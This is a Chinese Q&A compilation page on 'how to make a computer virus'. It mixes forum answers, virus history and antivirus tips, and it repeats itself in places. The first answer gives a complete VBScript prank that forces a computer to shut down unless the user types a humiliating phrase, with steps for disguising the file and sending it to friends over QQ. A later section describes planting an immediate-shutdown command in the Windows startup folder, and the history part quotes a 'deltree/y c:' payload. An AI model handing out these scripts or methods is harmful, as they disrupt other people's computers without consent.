怎么做电脑病毒

电脑教程024

怎么做电脑病毒,第1张

问题一:怎么制作电脑病毒 方法如下:在开始内点击运行输入at xx:xx shutdown -s,xx:xx代表几点几分是在几点几分关机输入shutdown.exe -s -t xx,xx代表多少秒钟后关机 如果要取消,就输入shutdown -a就可以取消了.

我听一个朋友说,有个人给他发个东西。他看了下。。说要输入一句话。。不然就管你机。是怎么编的。。。我知道关机命令和取消命令。。。不知道要对方怎么输才可以取消命令。。

脚本,例如下面的东西。就可以实现。

1。

首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看

把隐藏已知文件类型的扩展名前面的勾去掉.

然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去

on error resume next

dim WSHshellA

set WSHshellA = wscript.createobject(wscript.shell)

WSHshellA.run cmd.exe /c shutdown -r -t 60 -c 说我是猪,不说我是猪就一分钟关你机,不信,你试试・・・ ,0 ,true

dim a

do while(a 我是猪)

a = inputbox (说我是猪,就不关机,快撒,说 我是猪 ,说不说,不说,8000,7000)

msgbox chr(13) + chr(13) + chr(13) + a,0,MsgBox

loop

msgbox chr(13) + chr(13) + chr(13) + 早说就行了嘛,呵呵,猪

dim WSHshell

set WSHshell = wscript.createobject(wscript.shell)

WSHshell.run cmd.exe /c shutdown -a,0 ,true

msgbox chr(13) + chr(13) + chr(13) + 哈哈哈哈,真过瘾

复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打

开了就在60秒内要关闭计算机,

结素任务都不行,他只能说他是猪才能解决问题。够坏吧? 注意哦,你可以把我是猪那个修改成任

意想说的话,要是对付你喜欢的人,

就修改成 我爱你 这样他只有说我爱你之后才不关闭计算机哦 也可以把时间修改为20 就是说打

开了20秒就关了,还没等对方打完就关机了 是不是叫对方很郁闷呢?

第2招编写VBS脚本

首先你可以看下面的

WScript.Echo(嘿,谢谢你打开我哦,我等你很久拉!&TSName)

WScript.Echo(你是可爱的小朋吗?)

WScript.Echo(哈,我想你拉,这你都不知道吗?)

WScript.Echo(怎么才来,说~是不是不关心我)

WScript.Echo(哼,我生气拉,等你这么久,心都凉啦。)

WScript.Echo(小强很生气,......>>

问题二:如何制作电脑病毒 说来简单,去学编程,掌握基础知识就可以制作出一些没有什么实际意义的小病毒程序了。

等编程研究到一定高度了,就可以做破坏力大散播速范围广的病毒了。

但是,编程真的很难学。。。

问题三:怎么做电脑病毒。 制作电脑病毒是要会编程语言的。写病毒一般用C或delphi等。。C比较于delphi等高级语音来说比较难学,开发周期长!不过C也有他的特点。C可以直接对硬件进行操作,C比delphi等高级语言的执行效率高10-1000倍不等。C的代表病毒:熊猫烧香(李俊)delphi相比C就好学多了,不过delphi不能直接对研究进行操作,相对于C语言delphi编写出的程序执行效率要低点。delphi特点上手快,学习起来轻松,程序开发周期短。一般的黑客软件基本都是delphi编写的。 delphi被黑客公认为黑客的编程语言delphi的代表:灰鸽子(葛军大哥)

问题四:怎么制作电脑病毒。 制造病毒也会感染自己电脑,你可以装pe系统,在里面自己研究,你可以去华盟网看看

问题五:怎么制作电脑病毒? 有编程工具编写,c++、c#、c、java语言都可以编写病毒,关键需要编程基础。

问题六:如何制作简单的电脑病毒? 你好!

任何制造,传播,使用病毒程序破坏他人计算机安全的行为都是违法的。

请不要尝试!

问题七:怎么制作电脑病毒? 你懂编程么?! 你会C VC++ JAVA VB 等一些编汇语言么 不会的话空喊个什么啊 别老想着搞人家电脑 先看你自己电脑被搞了没有

问题八:我们应该怎么防止电脑病毒? 【平时就应该保护好我们的电脑,给一些建议】

1、安装杀毒软件还是必要的,要及时更新病毒库,还要装防火墙(防木马、黑客攻击等),定期杀毒,维护好电脑运行安全;

推荐楼主可以安装腾讯电脑管家,它是免费专业安全软件,杀毒管理二合一(只需要下载一份),占内存小,杀毒好,防护好,无误报误杀。拥有云查杀引擎、反病毒引擎、金山云查杀引擎、AVIRA查杀引擎、小红伞和查杀修复引擎等世界一流杀毒软件内嵌杀毒引擎!

其中软件升级、漏洞修复、垃圾清理,都有自动和定期设置,懒人必备

2、修复漏洞和补丁;打开腾讯电脑管家――工具箱――漏洞修复

3、平时不要上一些不明网站,不要随便下载东西;

4、还要提防随身移动存储设备(如U盘等,最近U盘病毒挺猖獗的);

5、不进不明不网站,不收奇怪邮件。下载完压缩包文件后先进行病毒扫描

6、关闭不必要的端口

7、要是有时间和精力的话,学一些电脑的常用技巧和知识;

最后,我要说的是,你要是平常的确是很小心,但还是中毒的话,那也是没办法的!(用Ghost备份系统是个不错的选择)

问题九:怎么制作一个病毒 可以攻击别人电脑的 攻击分很多种,不知道场想达到什么目的!让对方上不了网?洪水DDOS?控制对方电脑?盗取对方个人信息?但我要告诉你,都是犯法的,现在国家对信息安全管理的很严格!其实你现在干嘛WJ都知道,就是不愿意管!有的人下个A都能被罚!

问题十:如何制作电脑病毒 病毒其实是软件,但和其他软件不同的是,它是一个有害的软件,而比如360这些软件是好的软件

你可以用VC、VB、VS、delphi、JAVA等编程软件

推荐VC,QQ、360以及windows系列操作系统的部分,是用VC编写的。

但我要提醒你,要做成他们那样可不容易,因为编程是抽象的,你虽然有了编程软件,但你不是随便点几下按钮就能生成一个软件(木马)的,要精通这门语言

计算机病毒是当今的电脑用户不想遇到的,那你们肯定会好奇电脑病毒是怎么制造的,下面是我为大家整理的内容,希望对大家有所帮助!   计算机病毒的制作过程:   1.计算机病毒的特征是传播性,非授权性,隐藏性,潜伏性,破坏性,不可预见性,可触发性。   2.计算机病毒根据感染方式可以分为感染可执行文件的病毒,感染引导区的病毒,感染文档文件的病毒   3.现阶段的反病毒技术有特征码扫描,启发式扫描,虚拟机技术,主动防御技术,自免疫技术,云杀毒等等。   4.一个简单病毒的模块包含,触发模块,传播模块,表现模块。   5.学习计算机病毒,要了解硬盘结构,计算机扇区结构,计算机系统启动过程,文件系统,计算机引导过程。   6.汇编语言和C语言用的会比较多。   7.现阶段也有一些简单病毒制造机,此类软件可以在网上找到。   计算机病毒产生说法:   1.最早是为了恶作剧,计算机病毒最早出现于DOS,这是一个引导阶段,在这个阶段下,人们都是为了恶作剧,出现于1987年,当时的计算机硬件较少,功能简单,一般需要通过软盘启动后使用.引导型病毒利用软盘的启动原理工作,它们修改系统启动扇区,在计算机启动时首先取得控制权,减少系统内存,修改磁盘读写中断,影响系统工作效率,在系统存取磁盘时进行传播。1989年引导型病毒发展为可以感染硬盘,典型的代表有“石头(2)”   2.1989年,可执行文件型病毒出现,利用DOS系统加载执行文件的机制工作,代表为“耶路撒冷”,“星期天”病毒,病毒代码在系统执行文件时取得控制权,修改DOS中断,在系统调用时进行传染,并将自己附加在可执行文件中,使文件长度增加。   3。1990年,发展为复合型病毒,可感染COM和EXE文件。   4.1992年,伴随型病毒出现,它们利用DOS加载文件的优先顺序进行工作。   5.1994年,随着汇编语言的发展,实现同一功能可以用不同的方式进行完成,这些方式的组合使一段看似随机的代码产生相同的运算结果。幽灵病毒就是利用这个特点,每感染一次就产生不同的代码。例如“一半”病毒就是产生一段有上亿种可能的解码运算程序,病毒体被隐藏在解码前的数据中,查解这类病毒就必须能对这段数据进行解码,加大了查毒的难度。   6.1995年,生成器,变体机阶段   7.1995年,蠕虫   8.1996年,视窗阶段,出现于窗口化系统windows系列中。   9.1997年,因互联网出现,进入互联网即通过网络传播。   10.1997年,Java阶段,此时出现java语言进行传播和资料获取的病毒开始出现,典型的代表是JavaSnake病毒,还有一些利用邮件服务器进行传播和破坏的病毒,例如Mail-Bomb病毒,它会严重影响因特网的效率。   计算机病毒:病毒的含义   与医学上的“病毒”概念不同,计算机病毒不是自然存在的,你无法用任何一台显微镜观察到一个计算机病毒样本,它归根结底只是一串二进制代码。但由于计算机病毒与生物医学上的“病毒”同样具有传染性、破坏性、隐敝性和潜伏性,因此人们从生物医学上引申了“病毒”这个名词。   人们对计算机病毒最通常的定义可以表述为:“利用计算机软硬件所固有的弱点编制的具有自身复制能力的、会不断感染的、具有特殊目的的计算机程序”。这个定义不但包括人们熟知的“拿它死幽灵王”、CIH等恶性计算机病毒,还包含了我们熟悉的宏病毒。   Office文件并不是单纯的不可执行文件,虽然它本身不能作为程序执行,但微软公司为了扩展Office的功能,提供了一种专门的Basic语言—— VBA。编写者可以将程序代码嵌人Office文件中,当用Office程序打开这些文件时,程序代码便会自动执行。前一段流行的“美丽杀手 Melissa”病毒便是利用宏来使电子邮件程序Outlook自动根据通讯录中前五十个记录的地址发信,而最近的“七月杀手July Killer”宏病毒的破坏方式则是产生一个只含有一句“deltree/y c:”的Autoexec.bat文件来替代你原有的文件。   值得一提的是,“特洛伊木马程序”、“后门程序”和“蠕虫”这三个概念严格说来并不符合上述病毒定义。“特洛伊木马程序”的名字来自于世人共知的希腊神话:木马通常“伪装”成另一程序,比如一个著名的游戏或工具,不知情的用户运行后便上了当。虽然木马程序通常表现出格式化硬盘、传染病毒或安装“后门”等恶性行为,可是它并不会复制自己。“后门程序”是近来发展相当快的一类恶性黑客程序。从本质上说,后门软件是一套远程控制工具,当后门程序成功侵入计算机系统后便悄悄打开某个端口,接着黑客便能通过Internet窃取系统的网络帐号、密码等重要资料或破坏数据,为所欲为。“蠕虫”并不感染其他文件,仅仅是在系统之间永无止境地复制自己,不断消耗系统资源以至严重影响甚至拖垮整个系统。  

电脑病毒是我们大家都不陌生的,你们也肯定很好奇电脑病毒是什么编写的,下面是我为大家整理的相关的内容,希望对大家有帮助! 如何制作电脑病毒方法一:

计算机病毒是编写或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。

方法/步骤

1.计算机病毒的特征是传播性,非授权性,隐藏性,潜伏性,破坏性,不可预见性,可触发性。计算机病毒根据感染方式可以分为感染可执行文件的病毒,感染引导区的病毒,感染文档文件的病毒。

2.计算机病毒根据感染方式可以分为感染可执行文件的病毒,感染引导区的病毒,感染文档文件的病毒。

3.现阶段的反病毒技术有特征码扫描,启发式扫描,虚拟机技术,主动防御技术,自免疫技术,云杀毒等等。

4.一个简单病毒的模块包含,触发模块,传播模块,表现模块。

5.学习计算机病毒,要了解硬盘结构,计算机扇区结构,计算机系统启动过程,文件系统,计算机引导过程。

6.汇编语言和C语言用的会比较多。

注意事项

一个是要理解计算机系统,文件格式。

一个是要精通编程,汇编和C。

计算机病毒的编写方法二:

1.打开电脑左下角开始----所有程序----启动,右键点击启动选择属性单击左键。

2.查找下文件位置,找到启动所在文件夹。就可以进行下一步了。

3.打开启动这个文件,复制下文件路径。win7的启动文件家保存的是这个路径,XP的不是这个可以自己实验下。保存下备用

4新建一个记事本,写上如下代码保存。其中shutdown -s -t 0表示0秒后关机,代码的意思是把这个代码写到启动这个文件夹下面。

5.图中标记的代码就是刚才复制的路径,原理跟以前写过的自动关机代码差不多,只是自动关机时间调为0了。

电脑病毒的特点:

计算机病毒不但本身具有破坏性,更有害的是具有传染性,一旦病毒被复制或产生变种,其速度之快令人难以预防。

传染性是病毒的基本特征。

在生物界,病毒通过传染从一个生物体扩散到另一个生物体。在适当的条件下,它可得到大量繁殖,并使被感染的生物体表现出病症甚至死亡。同样,计算机病毒也会通过各种渠道从已被感染的计算机扩散到未被感染的计算机,在某些情况下造成被感染的计算机工作失常甚至瘫痪。与生物病毒不同的是,计算机病毒是一段人为编制的计算机程序代码,这段程序代码一旦进入计算机并得以执行,它就会搜寻其他符合其传染条件的程序或存储介质,确定目标后再将自身代码插入其中,达到自我繁殖的目的。

只要一台计算机染毒,如不及时处理,那么病毒会在这台电脑上迅速扩散,计算机病毒可通过各种可能的渠道,如软盘、计算机网络去传染其他的计算机。当您在一台机器上发现了病毒时,往往曾在这台计算机上用过的软盘已感染上了病毒,而与这台机器相联网的其他计算机也许也被该病毒染上了。是否具有传染性是判别一个程序是否为计算机病毒的最重要条件。

潜伏性

有些病毒像定时炸弹一样,让它什么时间发作是预先设计好的。比如黑色星期五病毒,不到预定时间一点都觉察不出来,等到条件具备的时候一下子就爆炸开来,对系统进行破坏。一个编制精巧的计算机病毒程序,进入系统之后一般不会马上发作,因此病毒可以静静地躲在磁盘或磁带里呆上几天,甚至几年,一旦时机成熟,得到运行机会,就又要四处繁殖、扩散,继续为害。潜伏性的第二种表现是指,计算机病毒的内部往往有一种触发机制,不满足触发条件时,计算机病毒除了传染外不做什么破坏。触发条件一旦得到满足,有的在屏幕上显示信息、图形或特殊标识,有的则执行破坏系统的操作,如格式化磁盘、删除磁盘文件、对数据文件做加密、封锁键盘以及使系统死锁等。

隐蔽性

计算机病毒具有很强的隐蔽性,有的可以通过病毒软件检查出来,有的根本就查不出来,有的时隐时现、变化无常,这类病毒处理起来通常很困难。

破坏性

计算机中毒后,可能会导致正常的程序无法运行,把计算机内的文件删除或受到不同程度的损坏 。通常表现为:增、删、改、移。

可触发性

病毒因某个事件或数值的出现,诱使病毒实施感染或进行攻击的特性称为可触发性。为了隐蔽自己,病毒必须潜伏,少做动作。如果完全不动,一直潜伏的话,病毒既不能感染也不能进行破坏,便失去了杀伤力。病毒既要隐蔽又要维持杀伤力,它必须具有可触发性。病毒的触发机制就是用来控制感染和破坏动作的频率的。病毒具有预定的触发条件,这些条件可能是时间、日期、文件类型或某些特定数据等。病毒运行时,触发机制检查预定条件是否满足,如果满足,启动感染或破坏动作,使病毒进行感染或攻击如果不满足,使病毒继续潜伏。